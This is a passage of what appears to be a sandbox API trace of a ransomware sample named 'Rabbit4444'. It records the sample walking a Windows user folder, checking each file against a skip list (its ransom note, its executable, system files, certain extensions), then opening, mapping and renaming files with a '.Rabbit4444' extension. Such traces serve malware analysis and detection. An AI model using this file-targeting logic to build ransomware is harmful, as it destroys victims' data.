"c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{58bfc882-c01d-4396-bf26-a55720bada37}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{58BFC882-C01D-4396-BF26-A55720BADA37}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{58bfc882-c01d-4396-bf26-a55720bada37}.rabbit4444"), dwFlags=0x1) returned 1 [0067.951] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99a88a0b, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x99a88a0b, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42140727, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0xea6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}", cAlternateFileName="{5AB00~1")) returned 1 [0067.952] lstrcmpiW (lpString1="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.952] lstrcmpiW (lpString1="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.952] lstrcmpiW (lpString1="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}", lpString2="Rabbit4444.exe") returned -1 [0067.952] lstrcmpiW (lpString1="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}", lpString2=".") returned 1 [0067.952] lstrcmpiW (lpString1="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}", lpString2="..") returned 1 [0067.952] lstrcmpiW (lpString1="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}", lpString2="windows") returned -1 [0067.952] lstrcmpiW (lpString1="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}", lpString2="bootmgr") returned -1 [0067.952] lstrcmpiW (lpString1="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}", lpString2="pagefile.sys") returned -1 [0067.952] lstrcmpiW (lpString1="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}", lpString2="boot") returned -1 [0067.952] lstrcmpiW (lpString1="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}", lpString2="ids.txt") returned -1 [0067.952] lstrcmpiW (lpString1="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}", lpString2="NTUSER.DAT") returned -1 [0067.952] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}" | out: lpString1="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}") returned="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}" [0067.952] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}", dwFileAttributes=0x0) returned 1 [0067.953] lstrlenW (lpString="{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}") returned 38 [0067.953] lstrlenW (lpString="Rabbit4444") returned 10 [0067.953] lstrcmpiW (lpString1="2FCBD0A3C}", lpString2="Rabbit4444") returned -1 [0067.953] lstrlenW (lpString=".dll") returned 4 [0067.953] lstrcmpiW (lpString1="A3C}", lpString2=".dll") returned 1 [0067.953] lstrlenW (lpString=".lnk") returned 4 [0067.953] lstrcmpiW (lpString1="A3C}", lpString2=".lnk") returned 1 [0067.953] lstrlenW (lpString=".ini") returned 4 [0067.953] lstrcmpiW (lpString1="A3C}", lpString2=".ini") returned 1 [0067.953] lstrlenW (lpString=".sys") returned 4 [0067.953] lstrcmpiW (lpString1="A3C}", lpString2=".sys") returned 1 [0067.953] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5ab008cb-0ce6-4ffc-9bf2-a552fcbd0a3c}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.954] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.954] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15926431930) returned 1 [0067.954] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=3750) returned 1 [0067.954] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0067.954] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0067.954] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11b0, lpName=0x0) returned 0x29c [0067.956] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11b0) returned 0x70000 [0067.957] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.957] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0067.957] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.957] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.957] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.957] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.957] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.957] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0067.958] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15926829489) returned 1 [0067.958] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0067.958] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0067.958] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.958] CloseHandle (hObject=0x29c) returned 1 [0067.958] CloseHandle (hObject=0x280) returned 1 [0067.958] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}.Rabbit4444") returned 156 [0067.958] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5ab008cb-0ce6-4ffc-9bf2-a552fcbd0a3c}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5AB008CB-0CE6-4FFC-9BF2-A552FCBD0A3C}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5ab008cb-0ce6-4ffc-9bf2-a552fcbd0a3c}.rabbit4444"), dwFlags=0x1) returned 1 [0067.959] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a0585cb, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9a0585cb, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42e363fa, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{5DB529E8-8819-4E86-B114-23BA7B771028}", cAlternateFileName="{5DB52~1")) returned 1 [0067.959] lstrcmpiW (lpString1="{5DB529E8-8819-4E86-B114-23BA7B771028}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.959] lstrcmpiW (lpString1="{5DB529E8-8819-4E86-B114-23BA7B771028}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.959] lstrcmpiW (lpString1="{5DB529E8-8819-4E86-B114-23BA7B771028}", lpString2="Rabbit4444.exe") returned -1 [0067.959] lstrcmpiW (lpString1="{5DB529E8-8819-4E86-B114-23BA7B771028}", lpString2=".") returned 1 [0067.959] lstrcmpiW (lpString1="{5DB529E8-8819-4E86-B114-23BA7B771028}", lpString2="..") returned 1 [0067.959] lstrcmpiW (lpString1="{5DB529E8-8819-4E86-B114-23BA7B771028}", lpString2="windows") returned -1 [0067.959] lstrcmpiW (lpString1="{5DB529E8-8819-4E86-B114-23BA7B771028}", lpString2="bootmgr") returned -1 [0067.959] lstrcmpiW (lpString1="{5DB529E8-8819-4E86-B114-23BA7B771028}", lpString2="pagefile.sys") returned -1 [0067.959] lstrcmpiW (lpString1="{5DB529E8-8819-4E86-B114-23BA7B771028}", lpString2="boot") returned -1 [0067.959] lstrcmpiW (lpString1="{5DB529E8-8819-4E86-B114-23BA7B771028}", lpString2="ids.txt") returned -1 [0067.959] lstrcmpiW (lpString1="{5DB529E8-8819-4E86-B114-23BA7B771028}", lpString2="NTUSER.DAT") returned -1 [0067.959] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{5DB529E8-8819-4E86-B114-23BA7B771028}" | out: lpString1="{5DB529E8-8819-4E86-B114-23BA7B771028}") returned="{5DB529E8-8819-4E86-B114-23BA7B771028}" [0067.959] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5DB529E8-8819-4E86-B114-23BA7B771028}", dwFileAttributes=0x0) returned 1 [0067.960] lstrlenW (lpString="{5DB529E8-8819-4E86-B114-23BA7B771028}") returned 38 [0067.960] lstrlenW (lpString="Rabbit4444") returned 10 [0067.960] lstrcmpiW (lpString1="A7B771028}", lpString2="Rabbit4444") returned -1 [0067.960] lstrlenW (lpString=".dll") returned 4 [0067.960] lstrcmpiW (lpString1="028}", lpString2=".dll") returned 1 [0067.960] lstrlenW (lpString=".lnk") returned 4 [0067.960] lstrcmpiW (lpString1="028}", lpString2=".lnk") returned 1 [0067.960] lstrlenW (lpString=".ini") returned 4 [0067.960] lstrcmpiW (lpString1="028}", lpString2=".ini") returned 1 [0067.960] lstrlenW (lpString=".sys") returned 4 [0067.960] lstrcmpiW (lpString1="028}", lpString2=".sys") returned 1 [0067.960] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5DB529E8-8819-4E86-B114-23BA7B771028}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5db529e8-8819-4e86-b114-23ba7b771028}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.960] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.960] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15927123158) returned 1 [0067.961] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0067.961] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0067.961] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.962] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0067.963] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0067.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.963] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.963] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15927419655) returned 1 [0067.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0067.964] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0067.964] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.964] CloseHandle (hObject=0x29c) returned 1 [0067.964] CloseHandle (hObject=0x280) returned 1 [0067.964] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5DB529E8-8819-4E86-B114-23BA7B771028}.Rabbit4444") returned 156 [0067.964] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5DB529E8-8819-4E86-B114-23BA7B771028}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5db529e8-8819-4e86-b114-23ba7b771028}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{5DB529E8-8819-4E86-B114-23BA7B771028}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{5db529e8-8819-4e86-b114-23ba7b771028}.rabbit4444"), dwFlags=0x1) returned 1 [0067.965] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9920a3b2, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x9920a3b2, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4216695a, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{60B864E9-702F-47ED-951E-4744ED9F9767}", cAlternateFileName="{60B86~1")) returned 1 [0067.965] lstrcmpiW (lpString1="{60B864E9-702F-47ED-951E-4744ED9F9767}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.965] lstrcmpiW (lpString1="{60B864E9-702F-47ED-951E-4744ED9F9767}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.965] lstrcmpiW (lpString1="{60B864E9-702F-47ED-951E-4744ED9F9767}", lpString2="Rabbit4444.exe") returned -1 [0067.965] lstrcmpiW (lpString1="{60B864E9-702F-47ED-951E-4744ED9F9767}", lpString2=".") returned 1 [0067.965] lstrcmpiW (lpString1="{60B864E9-702F-47ED-951E-4744ED9F9767}", lpString2="..") returned 1 [0067.965] lstrcmpiW (lpString1="{60B864E9-702F-47ED-951E-4744ED9F9767}", lpString2="windows") returned -1 [0067.965] lstrcmpiW (lpString1="{60B864E9-702F-47ED-951E-4744ED9F9767}", lpString2="bootmgr") returned -1 [0067.965] lstrcmpiW (lpString1="{60B864E9-702F-47ED-951E-4744ED9F9767}", lpString2="pagefile.sys") returned -1 [0067.965] lstrcmpiW (lpString1="{60B864E9-702F-47ED-951E-4744ED9F9767}", lpString2="boot") returned -1 [0067.965] lstrcmpiW (lpString1="{60B864E9-702F-47ED-951E-4744ED9F9767}", lpString2="ids.txt") returned -1 [0067.965] lstrcmpiW (lpString1="{60B864E9-702F-47ED-951E-4744ED9F9767}", lpString2="NTUSER.DAT") returned -1 [0067.965] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{60B864E9-702F-47ED-951E-4744ED9F9767}" | out: lpString1="{60B864E9-702F-47ED-951E-4744ED9F9767}") returned="{60B864E9-702F-47ED-951E-4744ED9F9767}" [0067.965] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{60B864E9-702F-47ED-951E-4744ED9F9767}", dwFileAttributes=0x0) returned 1 [0067.965] lstrlenW (lpString="{60B864E9-702F-47ED-951E-4744ED9F9767}") returned 38 [0067.965] lstrlenW (lpString="Rabbit4444") returned 10 [0067.965] lstrcmpiW (lpString1="4ED9F9767}", lpString2="Rabbit4444") returned -1 [0067.965] lstrlenW (lpString=".dll") returned 4 [0067.965] lstrcmpiW (lpString1="767}", lpString2=".dll") returned 1 [0067.965] lstrlenW (lpString=".lnk") returned 4 [0067.965] lstrcmpiW (lpString1="767}", lpString2=".lnk") returned 1 [0067.965] lstrlenW (lpString=".ini") returned 4 [0067.966] lstrcmpiW (lpString1="767}", lpString2=".ini") returned 1 [0067.966] lstrlenW (lpString=".sys") returned 4 [0067.966] lstrcmpiW (lpString1="767}", lpString2=".sys") returned 1 [0067.966] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{60B864E9-702F-47ED-951E-4744ED9F9767}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{60b864e9-702f-47ed-951e-4744ed9f9767}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.966] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.966] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15927673016) returned 1 [0067.966] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.966] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0067.966] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0067.966] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.967] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0067.968] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0067.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.969] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0067.969] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.969] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0067.969] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15927936669) returned 1 [0067.969] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0067.969] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0067.969] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.969] CloseHandle (hObject=0x29c) returned 1 [0067.969] CloseHandle (hObject=0x280) returned 1 [0067.969] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{60B864E9-702F-47ED-951E-4744ED9F9767}.Rabbit4444") returned 156 [0067.969] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{60B864E9-702F-47ED-951E-4744ED9F9767}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{60b864e9-702f-47ed-951e-4744ed9f9767}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{60B864E9-702F-47ED-951E-4744ED9F9767}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{60b864e9-702f-47ed-951e-4744ed9f9767}.rabbit4444"), dwFlags=0x1) returned 1 [0067.970] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x995ea0f7, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x995ea0f7, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x42e363fa, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}", cAlternateFileName="{6BB31~1")) returned 1 [0067.970] lstrcmpiW (lpString1="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.970] lstrcmpiW (lpString1="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.970] lstrcmpiW (lpString1="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}", lpString2="Rabbit4444.exe") returned -1 [0067.970] lstrcmpiW (lpString1="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}", lpString2=".") returned 1 [0067.970] lstrcmpiW (lpString1="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}", lpString2="..") returned 1 [0067.970] lstrcmpiW (lpString1="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}", lpString2="windows") returned -1 [0067.970] lstrcmpiW (lpString1="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}", lpString2="bootmgr") returned -1 [0067.970] lstrcmpiW (lpString1="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}", lpString2="pagefile.sys") returned -1 [0067.970] lstrcmpiW (lpString1="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}", lpString2="boot") returned -1 [0067.970] lstrcmpiW (lpString1="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}", lpString2="ids.txt") returned -1 [0067.970] lstrcmpiW (lpString1="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}", lpString2="NTUSER.DAT") returned -1 [0067.970] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}" | out: lpString1="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}") returned="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}" [0067.970] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6BB31C2E-FA0C-4956-A18E-B11812B9C486}", dwFileAttributes=0x0) returned 1 [0067.970] lstrlenW (lpString="{6BB31C2E-FA0C-4956-A18E-B11812B9C486}") returned 38 [0067.970] lstrlenW (lpString="Rabbit4444") returned 10 [0067.970] lstrcmpiW (lpString1="812B9C486}", lpString2="Rabbit4444") returned -1 [0067.970] lstrlenW (lpString=".dll") returned 4 [0067.971] lstrcmpiW (lpString1="486}", lpString2=".dll") returned 1 [0067.971] lstrlenW (lpString=".lnk") returned 4 [0067.971] lstrcmpiW (lpString1="486}", lpString2=".lnk") returned 1 [0067.971] lstrlenW (lpString=".ini") returned 4 [0067.971] lstrcmpiW (lpString1="486}", lpString2=".ini") returned 1 [0067.971] lstrlenW (lpString=".sys") returned 4 [0067.971] lstrcmpiW (lpString1="486}", lpString2=".sys") returned 1 [0067.971] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{6BB31C2E-FA0C-4956-A18E-B11812B9C486}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{6bb31c2e-fa0c-4956-a18e-b11812b9c486}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.971] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.971] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15928185247) returned 1 [0067.971] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.971] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0067.971] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0067.971] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.972] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.973] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.973] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 